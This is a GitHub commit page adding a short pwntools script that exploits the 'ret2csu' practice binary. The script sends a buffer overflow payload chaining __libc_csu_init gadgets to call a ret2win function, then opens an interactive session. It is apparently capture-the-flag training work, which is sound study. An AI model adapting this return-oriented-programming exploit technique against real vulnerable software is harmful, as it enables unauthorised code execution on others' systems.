Skip to content

Commit

Permalink
exploit for ret2csu
Browse files Browse the repository at this point in the history
  • Loading branch information
@AravGarg
AravGarg authored Mar 30, 2020
1 parent d3415ec commit 14a198f
Showing 1 changed file with 30 additions and 0 deletions.
30 changes: 30 additions & 0 deletions ret2csu.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
from pwn import *
target=process('./ret2csu')
print(target.recv())

csu1=0x40089a
csu2=0x400880
initptr=0x600e38
ret2win=0x4007b1

payload="A"*40
payload+=p64(csu1)
payload+=p64(0x0)
payload+=p64(0x1)
payload+=p64(initptr)
payload+=p64(0xf)
payload+=p64(0xf)
payload+=p64(0xdeadcafebabebeef)
payload+=p64(csu2)
payload+=p64(0xf)
payload+=p64(0xf)
payload+=p64(0xf)
payload+=p64(0xf)
payload+=p64(0xf)
payload+=p64(0xf)
payload+=p64(0xf)
payload+=p64(ret2win)

target.sendline(payload)
target.interactive()

0 comments on commit 14a198f

Please sign in to comment.